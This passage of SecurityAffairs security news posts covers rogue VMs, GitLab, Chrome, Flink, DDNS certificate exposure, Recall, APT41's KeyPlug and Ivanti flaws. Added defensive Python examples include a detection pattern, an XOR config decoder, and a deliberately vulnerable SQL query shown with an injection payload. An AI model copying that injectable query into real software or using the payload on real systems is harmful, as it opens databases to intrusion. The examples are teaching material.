“Simply using the hypervisor management interface to manage VMs is often insufficient and can be pointless when it comes to dealing with rogue VMs.” continues the update. “This is because rogue VMs operate outside the standard management processes and do not adhere to established security policies, making them difficult to detect and manage through the GUI alone. Instead, one needs special tools or techniques to identify and mitigate the risks associated with rogue VMs effectively.”

MITRE shared two scripts, Invoke-HiddenVMQuery and VirtualGHOST, that allow admins to identify and mitigate potential threats within the VMware environment. The first script, Invoke-HiddenVMQuery, was developed by MITRE, is written in PowerShell and serves to detect malicious activity: it scans for anomalous invocations of the /bin/vmx binary within rc.local.d scripts.
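The two detection ideas in the update, comparing what the hypervisor actually runs against what the management plane knows, and looking for /bin/vmx calls planted in boot scripts, can be illustrated in a few lines. The block below is an added example written for this article; it is not MITRE's Invoke-HiddenVMQuery or VirtualGHOST, and the inventory, process-list records and rc.local.d content are constructed sample data with simplified field names.

```python
"""Added example (not MITRE's tooling): two checks for the rogue-VM technique
described above, run over constructed sample data.
1. VMs present in the hypervisor's own process list but missing from the
   management inventory.
2. /bin/vmx invocations planted in an rc.local.d boot script."""
import re

# Constructed: VM names as the management plane (vCenter) reports them.
VCENTER_INVENTORY = {"web-01", "db-01", "jump-01"}

# Constructed: records collected on the ESXi host itself (for instance from
# `esxcli vm process list`); the field names are simplified for the example.
HYPERVISOR_VMS = [
    {"name": "web-01", "config": "/vmfs/volumes/ds1/web-01/web-01.vmx"},
    {"name": "db-01", "config": "/vmfs/volumes/ds1/db-01/db-01.vmx"},
    {"name": "jump-01", "config": "/vmfs/volumes/ds1/jump-01/jump-01.vmx"},
    {"name": "svc-update", "config": "/vmfs/volumes/ds1/.hidden/svc-update.vmx"},
]

# Constructed content of /etc/rc.local.d/local.sh with a planted VM start.
RC_LOCAL_SH = """#!/bin/sh
# local configuration options
# Note: modify at your own risk!
/bin/vmx /vmfs/volumes/ds1/.hidden/svc-update.vmx &
exit 0
"""

VMX_PATTERN = re.compile(r"(^|[\s;&|])/bin/vmx\b")


def find_unregistered_vms(inventory, running):
    """VMs the hypervisor is running that the management inventory does not know."""
    return [vm for vm in running if vm["name"] not in inventory]


def find_vmx_invocations(script_text):
    """(line_number, line) for each non-comment line that calls /bin/vmx.
    Boot scripts have no business starting VMs directly, so any hit is suspect."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if VMX_PATTERN.search(stripped):
            hits.append((number, stripped))
    return hits


def report(inventory=VCENTER_INVENTORY, running=HYPERVISOR_VMS, script=RC_LOCAL_SH):
    """Combine both checks into one findings dictionary."""
    return {
        "unregistered_vms": [vm["name"] for vm in find_unregistered_vms(inventory, running)],
        "vmx_in_boot_script": find_vmx_invocations(script),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

The first check is the one the update calls out as essential: a VM started straight from the hypervisor never appears in vCenter, so the only reliable inventory is the one taken on the host itself.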

“As adversaries continue to evolve their tactics and techniques, it is imperative for organizations to remain vigilant and adaptive in defending against cyber threats. By understanding and countering their new adversary behaviors, we can bolster our defenses and safeguard critical assets against future intrusions.” MITRE concludes.

Pierluigi Paganini

(SecurityAffairs – hacking, China)

An XSS flaw in GitLab allows attackers to take over accounts

24 May 2024 at 20:39

GitLab addressed a high-severity cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to take over user accounts.

GitLab fixed a high-severity XSS vulnerability, tracked as CVE-2024-4835, that allows attackers to take over user accounts.

An attacker can exploit this issue by using a specially crafted page to exfiltrate sensitive user information.

The vulnerability impacts versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1.

The flaw was addressed with the release of versions 17.0.1, 16.11.3, and 16.10.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).

“A XSS condition exists within GitLab in versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1.” reads the advisory published by the company. “By leveraging this condition, an attacker can craft a malicious page to exfiltrate sensitive user information.”

The researcher matanber reported this vulnerability through GitLab’s HackerOne bug bounty program and received a $10,270 bounty.

Below is the list of vulnerabilities addressed by the company:

  • High: 1-click account takeover via XSS leveraging the VS code editor (Web IDE)
  • Medium: A DOS vulnerability in the ‘description’ field of the runner
  • Medium: CSRF via K8s cluster-integration
  • Medium: Using Set Pipeline Status of a Commit API incorrectly create a new pipeline when SHA and pipeline_id did not match
  • Medium: Redos on wiki render API/Page
  • Medium: Resource exhaustion and denial of service with test_report API calls
  • Medium: Guest user can view dependency lists of private projects through job artifacts

In early May, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a GitLab Community and Enterprise Editions improper access control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

The issue, tracked as CVE-2023-7028 (CVSS score: 10.0), is an account takeover via Password Reset. The flaw can be exploited to hijack an account without any interaction.

Pierluigi Paganini

(SecurityAffairs – hacking, XSS)

Google fixes eighth actively exploited Chrome zero-day this year, the third in a month

24 May 2024 at 13:13

Google rolled out a new emergency security update to fix another actively exploited zero-day vulnerability in the Chrome browser.

Google has released a new emergency security update to address a new vulnerability, tracked as CVE-2024-5274, in the Chrome browser; it is the eighth zero-day exploited in attacks disclosed this year.

The vulnerability is a high-severity ‘type confusion’ in the V8 JavaScript engine, discovered by Google researchers Clément Lecigne and Brendon Tiszka. The company confirmed that the flaw is exploited in attacks in the wild.

“Type Confusion in V8. Reported by Clément Lecigne of Google’s Threat Analysis Group and Brendon Tiszka of Chrome Security on 2024-05-20” reads the security advisory. “Google is aware that an exploit for CVE-2024-5274 exists in the wild.”

A “type confusion” vulnerability occurs when a program incorrectly handles variables of one type as if they were another type. This can happen due to flaws in type checking, casting, or other operations involving variable types, leading to unpredictable behavior and potential security risks.

As usual, Google did not publish details about the attacks exploiting the vulnerability.

“Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.” continues the advisory.

Google addressed the issue with the release of version 125.0.6422.112/.113 for Windows and Mac, while Linux users will get the update on version 125.0.6422.112 in the coming weeks.

Below is the list of actively exploited zero-day vulnerabilities in the Chrome browser that have been fixed this year:

  • CVE-2024-0519: an out of bounds memory access in the Chrome JavaScript engine. (January 2024)
  • CVE-2024-2887: a type confusion issue that resides in WebAssembly. Manfred Paul demonstrated the vulnerability during the Pwn2Own 2024. (March 2024)
  • CVE-2024-2886: a use after free issue that resides in the WebCodecs. The flaw was demonstrated by Seunghyun Lee (@0x10n) of KAIST Hacking Lab during the Pwn2Own 2024. (March 2024)
  • CVE-2024-3159: an out-of-bounds memory access in V8 JavaScript engine. The flaw was demonstrated by Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) of Palo Alto Networks during the Pwn2Own 2024 on March 22, 2024. (March 2024)
  • CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). 
  • CVE-2024-4761: an out-of-bounds write issue that resides in the V8 JavaScript engine (May 2024).
  • CVE-2024-4947:  a type confusion that resides in V8 JavaScript engine (May 2024). 

The vulnerability CVE-2024-4947 was the third actively exploited zero-day disclosed this month, after CVE-2024-4671 and CVE-2024-4761.

Pierluigi Paganini

(SecurityAffairs – hacking, Google)

CISA adds Apache Flink flaw to its Known Exploited Vulnerabilities catalog

24 May 2024 at 10:25

CISA adds Apache Flink improper access control vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Flink vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

The issue, tracked as CVE-2020-17519, is an improper access control vulnerability in Apache Flink.

Apache Flink contains an improper access control vulnerability that allows an attacker to read any file on the local filesystem of the JobManager through its REST interface.

An improper access control vulnerability occurs when an application or system does not adequately restrict user permissions, allowing unauthorized users to access resources, perform actions, or obtain data they should not be able to. This type of vulnerability can lead to unauthorized access, data breaches, and other security issues.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by June 13, 2024.

Pierluigi Paganini

(SecurityAffairs – hacking, Apache Flink)

Usage of TLS in DDNS Services leads to Information Disclosure in Multiple Vendors

24 May 2024 at 08:58

The use of Dynamic DNS (DDNS) services embedded in appliances can potentially expose data and devices to attacks.

Advisory on security impacts related to the use of TLS in proprietary vendor Dynamic DNS (DDNS) services.

Threat scenario

The use of Dynamic DNS (DDNS[1]) services embedded in appliances, such as those provided by vendors like Fortinet or QNAP, carries cybersecurity implications. It increases the discoverability of customer devices by attackers.

Imagine a perfect world for an attacker, where they can precisely identify devices belonging to customers of a specific vendor, all using a product potentially riddled with known vulnerabilities or zero-day exploits.

In this advisory, I aim to explore how implementing a specific security technological combination (TLS and DDNS) negatively influences the overall security, inadvertently creating opportunities for attackers to exploit weaknesses on a massive scale.

Introduction to TLS and Certificate Transparency Log

Securing Internet communications is crucial for maintaining the confidentiality and integrity of information in transit. This is typically achieved through a combination of Public Key Infrastructure (using X.509[2] certificates) and encrypted, authenticated connections (TLS[3] and its precursor, SSL[4]).

Certificate Transparency (CT)[5] is a mechanism designed to ensure transparency in the issuance of certificates, with the main aim of spotting rogue Certification Authorities (CAs) and the issuance of fraudulent certificates[6]. The Certificate Transparency Log is a public and immutable record of all issued certificates.

The process of the Certificate Transparency Registry can be summarized in the following steps:

  1. Request for SSL Certificate: A website requests an SSL certificate from a Certification Authority (CA).
  2. Issuance of SSL Certificate: The CA issues an SSL certificate.
  3. Logging in Certificate Transparency Log: The issued certificate is recorded in the Certificate Transparency Log along with other relevant information, such as domain name, date and time of issuance, and other details.

Although the Certificate Transparency Log is designed to improve security and transparency, its public nature leads to known Information Disclosure risks. Attackers abuse the Certificate Transparency Log to identify subdomains (FQDNs) in order to map a target’s attack surface and, consequently, exploit vulnerabilities[7].

Introduction to DDNS (Dynamic-DNS)

Dynamic Domain Name System (also known as Dynamic DNS or DDNS) is a technology that allows users to link a Fully Qualified Domain Name (FQDN) with an IP address that may change over time.

This system consists of two main components: a DDNS client installed on the device that needs to be accessible and a DDNS server managed by a service provider.

Although this type of technology is not recommended for use in SMB (Small and Medium Business) or Enterprise environments (spoiler: it often is), it is highly popular in SOHO (Small Office/Home Office) settings. In fact, an increasing number of vendors are now integrating this service into their appliances to meet this demand.

Mass-Exploitation

The combined use of these two technologies – requiring a certificate for an FQDN associated with a DDNS domain owned by a specific vendor – can lead to widespread exploitation of vulnerabilities.

For instance, suppose firewall manufacturer ACME Inc. offers its DDNS service under the domain “acme-firewall.com”.

If a vulnerability were discovered in this firewall, a malicious user could abuse the Certificate Transparency Log to identify vulnerable targets by querying all subdomains of “acme-firewall.com”. This would allow them to massively compromise thousands of exposed devices.
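The same public records cut both ways: the owner of a fleet of ACME appliances can use them to learn which devices have requested certificates under the vendor's DDNS domain and are therefore discoverable. The block below is an added example, not part of the advisory or any vendor's tooling. It works only on records already in hand (no queries are made), and the record shape, one `name_value` entry per certificate listing its names plus a `not_after` expiry, is an assumption constructed for the example, as are the hostnames.

```python
"""Added example, not part of the advisory: build an exposure inventory from
Certificate Transparency records for a vendor DDNS domain, keeping only
certificates that were still valid at a given point in time."""
from datetime import datetime

VENDOR_DDNS_DOMAIN = "acme-firewall.com"  # the advisory's hypothetical vendor

# Constructed CT records. Several names may share one certificate.
CT_RECORDS = [
    {"name_value": "branch-01.acme-firewall.com", "not_after": "2024-08-01T00:00:00"},
    {"name_value": "branch-01.acme-firewall.com\nvpn.branch-01.acme-firewall.com",
     "not_after": "2024-08-01T00:00:00"},
    {"name_value": "hq-fw.acme-firewall.com", "not_after": "2023-01-01T00:00:00"},  # expired
    {"name_value": "*.acme-firewall.com", "not_after": "2030-01-01T00:00:00"},  # wildcard
    {"name_value": "www.acme-firewall.com", "not_after": "2030-01-01T00:00:00"},  # vendor site
    {"name_value": "other.example.net", "not_after": "2030-01-01T00:00:00"},  # unrelated
]


def exposed_hosts(records, domain, now_iso, vendor_labels=("www",)):
    """Sorted device FQDNs under `domain` whose certificate was still valid at
    `now_iso`. Wildcards and the vendor's own labels are not devices and are skipped."""
    now = datetime.fromisoformat(now_iso)
    suffix = "." + domain.lower()
    hosts = set()
    for rec in records:
        if datetime.fromisoformat(rec["not_after"]) <= now:
            continue  # expired certificate: treat as no longer exposed
        for name in rec["name_value"].splitlines():
            name = name.strip().lower()
            if name.startswith("*") or not name.endswith(suffix):
                continue
            # label directly under the vendor domain, e.g. "branch-01" or "www"
            device_label = name[: -len(suffix)].split(".")[-1]
            if device_label in vendor_labels:
                continue
            hosts.add(name)
    return sorted(hosts)


def summary(records=CT_RECORDS, domain=VENDOR_DDNS_DOMAIN, now_iso="2024-05-24T00:00:00"):
    """Count and list the exposed devices as of the advisory's date (constructed)."""
    hosts = exposed_hosts(records, domain, now_iso)
    return {"domain": domain, "count": len(hosts), "hosts": hosts}


if __name__ == "__main__":
    print(summary())
```

Filtering on expiry mirrors the advisory's own method; Shodan-style counts based on the certificate's Common Name will usually be higher because they also catch devices whose certificates have lapsed but are still answering.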

Fortinet

Fortinet has introduced the “FortiGuard DDNS” service in its FortiGate firewall products. While this service facilitates the setup of VPN systems in the absence of a static IP, it inadvertently encourages the exposure of the appliance’s administrative interface to the Internet.

This DDNS service uses three Fortinet-owned domains: fortiddns.com, fortidyndns.com, and float-zone.com. It also integrates an ACME client for automatic certificate generation via Let’s Encrypt[8].

By querying a Certificate Transparency Log service[9] for the fortiddns.com domain, an attacker can uncover over 2300 potential targets that have recently been issued TLS certificates for fortiddns.com (filtering for certificates that have not yet expired). The service used for this sample truncated the results due to an excessive number of matching entries, indicating that there are actually many more potential targets.

However, Shodan[10] indexed up to 7968 targets for the same domain. Almost all of these hosts were indexed using the “Common Name” field of the SSL certificate.

QNAP

QNAP offers the “myQNAPcloud” service to simplify remote access to its NAS products.

However, this service inadvertently encourages the exposure of these appliances to the Internet by using the proprietary DDNS myqnapcloud.com.

The Certificate Transparency Registry service reveals over 4400 potential targets, with search results truncated due to the large number of entries.

Shodan returns 39027 targets, all indexed through the “Common Name” field of the certificate.

Mikrotik

The router and switch manufacturer Mikrotik also offers a DDNS service on the sn.mynetname.net domain and integrates an ACME client into its appliances. The subdomain generated by this service consists of the appliance’s serial number (which corresponds to the MAC address of the first network interface), for example: serialnumber.sn.mynetname.net.

The Certificate Transparency Log service reveals over 1300 potential targets, with the search results truncated due to the high number of entries.

Shodan, on the other hand, returns 3885 targets indexed by the Common Name field.

Conclusion

While the easy availability (in some cases a checkbox) of DDNS in technological appliances does not automatically expose administrative interfaces and services to the Internet, it does encourage this practice. When combined with an ACME client that automatically generates an X.509 certificate for the DDNS domain, it inherently creates an information disclosure risk.

Therefore, it is crucial for manufacturers to clearly communicate these potential security hazards to users, emphasizing the importance of cautious configuration.

References and additional info are included in the original analysis available here:

https://www.ush.it/2024/05/23/tls-ddns-multiple-vendor-information-disclosure/

About the author: Pasquale ‘sid’ Fiorillo: Senior Security Researcher | CEH

Pierluigi Paganini

(SecurityAffairs – hacking, Dynamic DNS (DDNS))

Recall feature in Microsoft Copilot+ PCs raises privacy and security concerns

24 May 2024 at 08:09

UK data watchdog is investigating Microsoft regarding the new Recall feature in Copilot+ PCs that captures screenshots of the user’s laptop every few seconds.

The UK data watchdog, the Information Commissioner’s Office (ICO), is investigating a new feature, called Recall, implemented by Microsoft in Copilot+ PCs that captures screenshots of the user’s laptop every few seconds.

“You can use Recall on Copilot+ PCs to find the content you have viewed on your device. Recall is currently in preview status; during this phase, we will collect customer feedback, develop more controls for enterprise customers to manage and govern Recall data, and improve the overall experience for users.” reads the announcement.

Microsoft explained that the Recall feature stores encrypted snapshots locally on the user’s computer and will only be available on forthcoming Copilot+ PCs. Microsoft does not have access to the snapshots.

Privacy advocates fear the potential abuses of the feature and have called it a potential “privacy nightmare”.

The IT giant attempted to downplay the risks for users; it pointed out that the feature was developed with privacy and security by design and is an “optional experience.”

Microsoft added that Recall does not take snapshots of certain kinds of content, such as InPrivate web browsing sessions in Microsoft Edge.

Users can manage which snapshots Recall collects, excluding specific apps or websites. They can also pause snapshot collection, clear some or all stored snapshots, or delete all snapshots from their device.

The only way to access Recall data is to gain physical access to the user’s device, unlock it and sign in.

“We are making enquiries with Microsoft to understand the safeguards in place to protect user privacy,” an ICO spokesperson told BBC.

The snapshots could capture users’ passwords, with a severe impact on their privacy and security.

“[This includes] law enforcement court orders, or even from Microsoft if they change their mind about keeping all this content local and not using it for targeted advertising or training their AIs down the line,” said Jen Caltrider, who leads a privacy team at Mozilla.

Pierluigi Paganini

(SecurityAffairs – hacking, Copilot)

APT41: The threat of KeyPlug against Italian industries

23 May 2024 at 13:09

Tinexta Cyber’s Zlab Malware Team uncovered a backdoor known as KeyPlug employed in attacks against several Italian industries.

During an extensive investigation, Tinexta Cyber’s Zlab Malware Team uncovered a backdoor known as KeyPlug, which for months hit a variety of Italian industries. This backdoor is attributed to the arsenal of APT41, a group whose origin is tied to China.

APT41, also known as Amoeba, BARIUM, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Brass Typhoon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Red Kelpie, TA415, WICKED PANDA and WICKED SPIDER, originated from China (with possible ties to the government). It is known for its complex campaigns and the variety of sectors it targets; its motivation varies from exfiltration of sensitive data to financial gain.

The backdoor has been developed to target both Windows and Linux operating systems and uses different communication protocols depending on the configuration of the malware sample itself.

Tinexta Cyber’s team analyzed both the Windows and Linux variants, showing common elements that make the threat capable of remaining resilient inside attacked systems, even though perimeter defenses such as firewalls, NIDS and EDR were deployed on every endpoint.

The first malware sample is an implant attacking Microsoft Windows operating systems. The infection doesn’t start directly from the implant itself but from another component, a loader written for the .NET framework. This loader is designed to decrypt another file disguised as an icon file. Decryption uses AES, a well-known symmetric encryption algorithm, with keys stored directly in the sample itself.

Once all decryption operations are completed, the new payload, with SHA256 hash 399bf858d435e26b1487fe5554ff10d85191d81c7ac004d4d9e268c9e042f7bf, can be analyzed. Delving deeper into that malware sample, its structure corresponds directly to the malware described in Mandiant’s report “Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments”. In this specific case, the XOR key is 0x59.
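A single-byte XOR key such as the 0x59 quoted above is the kind of detail an analyst needs in order to read a sample's embedded configuration, and it is often recoverable even when unknown. The block below is an added example written for this article, not code or data from the Tinexta Cyber or Mandiant reports: the configuration blob, its fixed-width NUL-padded field layout and the field values are constructed, and nothing here describes KeyPlug's actual format.

```python
"""Added example (not from the Tinexta Cyber report): single-byte XOR decoding
with a known key, recovery of an unknown single-byte key from a zero-padded
config blob, and splitting the result into fixed-width fields."""
from collections import Counter

KNOWN_KEY = 0x59   # the key value quoted in the article
FIELD_LEN = 32     # assumed fixed-width field layout for the constructed blob


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def build_sample_blob() -> bytes:
    """Constructed config: three NUL-padded fields, XOR-encoded with KNOWN_KEY."""
    fields = [b"update.example.invalid", b"443", b"wss"]
    plain = b"".join(f.ljust(FIELD_LEN, b"\x00") for f in fields)
    return xor_bytes(plain, KNOWN_KEY)


def looks_decoded(buf: bytes) -> bool:
    """True when the buffer is made only of printable ASCII and NUL padding."""
    return all(b == 0 or 0x20 <= b < 0x7F for b in buf)


def recover_key(blob: bytes):
    """NUL padding in the plaintext becomes the key byte in the ciphertext, so
    try ciphertext bytes from most to least frequent and keep the first key
    whose output passes the plausibility check. None when no candidate does."""
    for key, _count in Counter(blob).most_common():
        if looks_decoded(xor_bytes(blob, key)):
            return key
    return None


def parse_fields(decoded: bytes, width: int = FIELD_LEN):
    """Split a decoded blob into fixed-width fields, stripping NUL padding."""
    return [decoded[i:i + width].rstrip(b"\x00").decode("ascii")
            for i in range(0, len(decoded), width)]


def decode_config(blob: bytes):
    """Return (key, fields) for a blob, or None when no single-byte key fits."""
    key = recover_key(blob)
    if key is None:
        return None
    return key, parse_fields(xor_bytes(blob, key))


if __name__ == "__main__":
    print(decode_config(build_sample_blob()))
```

The frequency heuristic only works because padding dominates the blob; for a densely packed configuration one would instead score candidates against a known header or expected field values.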

The Linux version of the Keyplug malware, however, is slightly more complex and appears to use VMProtect. During static analysis, many strings related to the UPX packer were detected, but the automatic decompression routine did not work. This variant is designed to decode the payload code during execution, and once this is complete, it relaunches using the syscall fork. This method interrupts the analyst’s control flow, making malware analysis more difficult.

Pivoting on cyber intelligence information shared in the cybersecurity community, a potential link has emerged between the APT41 group and the Chinese company I-Soon. On Feb. 16, a large amount of sensitive data from China’s Ministry of Public Security was exposed and then spread on GitHub and Twitter, generating great excitement in the cybersecurity community.

In addition, the I-SOON leak revealed Hector, a tool in APT41’s arsenal that is possibly a RAT (Remote Administration Tool), if not KeyPlug itself; according to the leaked material it can be deployed on both Windows and Linux and uses the WSS protocol. WSS (WebSocket Secure) is a network protocol used to establish a secure WebSocket connection between a client and a server. It is the encrypted version of the WS (WebSocket) protocol and relies on TLS (Transport Layer Security) to provide security, similar to how HTTPS is the secure version of HTTP. However, this protocol is not widely adopted by malware authors, which narrows the attribution for this kind of threat.

A connection between the APT41 group and the ISOON data leak incident can be hypothesized. The advanced techniques used and the wide range of sectors targeted coincide with APT41’s typical modus operandi, suggesting a possible connection to this cyber espionage campaign. Deepening the investigation of the ISOON data leak, especially about the tools and methodologies employed, could offer further insight into the involvement of APT41 or similar groups.

“APT41 has always been distinguished by its sophistication and ability to conduct global cyber espionage operations. One of the tools it has used and continues to use is KEYPLUG, a modular backdoor capable of evading major detection systems that has offered the attacker the ability to be silent within compromised systems for months.” Luigi Martire, Technical Leader at Tinexta Cyber, told Security Affairs.
“The risks associated with industrial espionage carried out by groups such as APT41 are significant. Their operations can aim to steal intellectual property, trade secrets, and sensitive information that could confer illicit competitive advantages. Companies operating in technologically advanced or strategic industries are particularly vulnerable, and the consequences of such attacks can include large economic losses, reputational damage, and compromised national security.”

Technical details about the attacks and indicators of compromise (IoCs) are included in the report published by Tinexta Cyber.

Pierluigi Paganini

(SecurityAffairs – hacking, APT41)

Critical SQL Injection flaws impact Ivanti Endpoint Manager (EPM)

23 May 2024 at 10:49

Ivanti addressed multiple flaws in the Endpoint Manager (EPM), including remote code execution vulnerabilities.

Ivanti this week rolled out security patches to address multiple critical vulnerabilities in the Endpoint Manager (EPM). A remote attacker can exploit the flaws to gain code execution under certain conditions.

Below is the list of the addressed vulnerabilities:

  • CVE-2024-29822 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29823 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29824 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29825 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29826 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29827 (CVSS 9.6; CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29828 (CVSS 8.4; CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an authenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29829 (CVSS 8.4; CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an authenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29830 (CVSS 8.4; CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an authenticated attacker within the same network to execute arbitrary code.
  • CVE-2024-29846 (CVSS 8.4; CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H): An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an authenticated attacker within the same network to execute arbitrary code.

The vulnerabilities impact 2022 SU5 and earlier versions.

Six out of 10 vulnerabilities (CVE-2024-29822, CVE-2024-29823, CVE-2024-29824, CVE-2024-29825, CVE-2024-29826, CVE-2024-29827) have been rated critical (CVSS score 9.6).

The flaws are SQL injection issues; an unauthenticated attacker within the same network can exploit them to execute arbitrary code.
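Ivanti has not described the injection points, so the following is an added example of the vulnerability class in general rather than of the EPM flaws: a lookup that splices an untrusted value into the statement text, beside the parameterized form that fixes it. It uses an in-memory SQLite table with constructed rows; none of it is Ivanti's code.

```python
"""Added example: string-built SQL beside its parameterized fix, on a
constructed SQLite table. Illustrates the class, not the Ivanti EPM flaws."""
import sqlite3


def make_db():
    """Constructed sample table of managed devices."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE devices (id INTEGER, name TEXT, owner TEXT)")
    con.executemany(
        "INSERT INTO devices VALUES (?, ?, ?)",
        [(1, "ws-01", "alice"), (2, "ws-02", "bob"), (3, "srv-01", "ops")],
    )
    return con


def lookup_vulnerable(con, owner):
    """Untrusted input becomes part of the statement text, so a crafted value
    can change the query's structure instead of being compared as data."""
    sql = "SELECT name FROM devices WHERE owner = '%s' ORDER BY id" % owner
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, owner):
    """The value travels as a bound parameter; it is only ever compared as data."""
    sql = "SELECT name FROM devices WHERE owner = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (owner,))]


def demo():
    """Run both lookups with an honest value and with the textbook tautology."""
    con = make_db()
    tautology = "' OR '1'='1"
    return {
        "honest_vulnerable": lookup_vulnerable(con, "alice"),
        "tautology_vulnerable": lookup_vulnerable(con, tautology),
        "honest_parameterized": lookup_parameterized(con, "alice"),
        "tautology_parameterized": lookup_parameterized(con, tautology),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```

Note that the parameterized version returns nothing for the tautology: the whole string is looked up as an owner name, which is the behaviour a CVSS "arbitrary code execution" finding means has been lost when a server builds its queries the first way.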

The company is not aware of attacks in the wild exploiting these vulnerabilities.

“We are not aware of any customers being exploited by this vulnerability at the time of disclosure.” reads the advisory.

Pierluigi Paganini

(SecurityAffairs – hacking, Ivanti Endpoint Manager)

Chinese actor ‘Unfading Sea Haze’ remained undetected for five years

23 May 2024 at 08:55

A previously unknown China-linked threat actor dubbed ‘Unfading Sea Haze’ has been targeting military and government entities since 2018.

Bitdefender researchers discovered a previously unknown China-linked threat actor dubbed ‘Unfading Sea Haze’ that has been targeting military and government entities since 2018. The threat group focuses on entities in countries bordering the South China Sea, and experts noticed TTP overlap with operations attributed to APT41.

Bitdefender identified a troubling trend: the attackers repeatedly regained access to compromised systems, highlighting weaknesses such as poor credential hygiene and inadequate patching practices.

Unfading Sea Haze remained undetected for over five years; despite extensive artifact cross-referencing and public report analysis, no traces of its prior activities were found.

Unfading Sea Haze’s targets confirm an alignment with Chinese interests. The group utilized various variants of the Gh0st RAT, commonly associated with Chinese actors.

A notable technique involved running JScript code through SharpJSHandler, similar to a feature in the “funnyswitch” backdoor linked to APT41. Both methods involve loading .NET assemblies and executing JScript code, suggesting shared coding practices among Chinese threat actors.

Taken together, these findings indicate a sophisticated threat actor possibly connected to the Chinese cyber landscape.

The researchers cannot determine the initial method used by Unfading Sea Haze to infiltrate victim systems, because the initial breach happened over six years ago, making it hard to recover forensic evidence.

However, the researchers determined that one of the methods used by the threat actors to regain access to the target organizations is spear-phishing emails. The messages use specially crafted archives containing LNK files disguised as regular documents. When clicked, the LNK files execute malicious commands. The experts observed multiple spear-phishing attempts between March and May 2023.

Some of the email attachment names used in the attacks are:

  • SUMMARIZE SPECIAL ORDERS FOR PROMOTIONS CY2023
  • Data
  • Doc
  • Startechup_fINAL

The payload employed in the attacks is a backdoor named SerialPktdoor. In March 2024, however, the researchers observed the threat actors using new initial-access archive files. These archives mimicked the installation process of Microsoft Defender or exploited current US political issues.

The backdoor runs PowerShell scripts and performs operations on files and directories.

“These LNK files execute a PowerShell command line” reads the report. “This is a clever example of a fileless attack that exploits a legitimate tool: MSBuild.exe. MSBuild, short for Microsoft Build Engine, is a powerful tool for automating the software build process on Windows. MSBuild reads a project file, which specifies the location of all source code components, the order of assembly, and any necessary build tools.”

The threat actors maintain persistence through scheduled tasks; to avoid detection, the attackers used task names impersonating legitimate Windows files. The tasks are combined with DLL sideloading to execute a malicious payload.

Attackers also manipulate local Administrator accounts to maintain persistence: they were spotted enabling the disabled local Administrator account and then resetting its password.
